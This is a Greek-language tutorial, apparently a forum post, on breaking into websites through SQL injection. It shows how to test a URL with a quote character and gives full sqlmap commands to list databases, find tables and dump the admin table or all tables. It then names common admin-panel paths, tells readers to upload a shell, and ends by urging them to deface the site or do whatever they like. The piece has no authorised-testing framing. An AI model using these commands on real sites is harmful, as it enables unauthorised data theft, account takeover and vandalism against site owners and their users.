Το
SQL Injection είναι μια συχνή μέθοδος επίθεσης στις DataBase μιας ιστοσελίδας...
Για να το κάνουμε και εμείς αυτό θα χρειαστούμε μια έκδοση του BackTrack καλύτερα το 5 R1 και μια vulnerable σελίδα.
Πριν ξεκινήσουμε την επίθεση, θα πρέπει πρώτα να ελέγξουμε το site αν είναι vulnerable αυτό θα το κάνουμε με έναν πολύ απλό τρόπο. Προσθέτοντας ένα ' στο τέλος του URL της σελίδας
πχ http://www.example.com/index.php?id=123' αν αυτό μας δώσει ένα οποιοδήποτε σφάλμα σημάνει ότι
είναι vulnerable Αν ΔΕΝ μας δώσει και η σελίδα φορτώσει κανονικά τότε το site
ΔΕΝ είναι vulnerable Αφού έχουμε ελέγξει και έχουμε δει ότι είναι vulnerable στο SQL Injection τότε προχωράμε στο επόμενο βήμα που είναι το BackTrack..
Στο terminal του BackTrack πληκτρολογούμε την εντολή: cd /pentest/database/sqlmap και πατάμε enter. Μετά python sqlmap.py -u την διεύθυνση της σελίδας
ΧΩΡΙΣ ΤΟ ' --dbs
πχ python sqlmap.py -u http://www.example.com/index.php?id=123 --dbs και enter..
Αυτό θα πρέπει να μας δώσει τα ονόματα των DataBase.. Όταν ολοκληρωθεί η εντολή αυτή θα έχουμε ένα μεγάλο κείμενο που κάπου εκεί θα λέει τα ονόματα των DataBase πρέπει να τα βρείτε για να συνεχιστεί η επίθεση! Ας πούμε ότι βρήκαμε αυτές τις DataBase:
available databases [2]:
[*] database1
[*] database2
Τώρα θέλουμε να βρούμε τα tables για να βρούμε κωδικούς των διαχειριστών κλπ Αυτό θα το πετύχουμε με την εντολή:
python sqlmap.py -u http://www.example.com/index.php?id=123 --tables -D database1
Αυτό μπορεί να σας δώσει
ΠΟΛΛΑ tables.. Εσείς θα Ασχοληθείτε με αυτό που σας ενδιαφέρει.. Ας πούμε ότι θέλουμε τον κωδικό του administrator.. Βρήκαμε ένα table με όνομα admin και υποθέτουμε ότι οι κωδικοί και το username του είναι εκεί οπότε θέλουμε να ανοίξουμε αυτό το table!
python sqlmap.py -u http://www.example.com/index.php?id=123 -D database1 -T admin --dump
ή εάν θέλουμε να ανοίξουμε όλα τα tables μίας DataBase:
python sqlmap.py -u http://www.example.com/index.php?id=123 --tables -D database1 --dump-all
Τώρα αν κάνατε τα πάντα σωστά θα έχετε πρόσβαση στην σελίδα ως διαχειριστής
υπάρχει περίπτωση να μην μπορείτε να κάνετε πολλές αλλαγές από εκεί.. Γιαυτό θα πρέπει να ανεβάσετε ένα shell στην DataBase..
Και επίσης να βρείτε και το Admin Panel!
Το πιο συνηθισμένο είναι:
/admin
/administrator
/admin/login
/admin_login
/login
Κ.α
Αυτό ήταν τώρα μπείτε και κάντε Deface ή ΟΤΙ άλλο θέλετε!!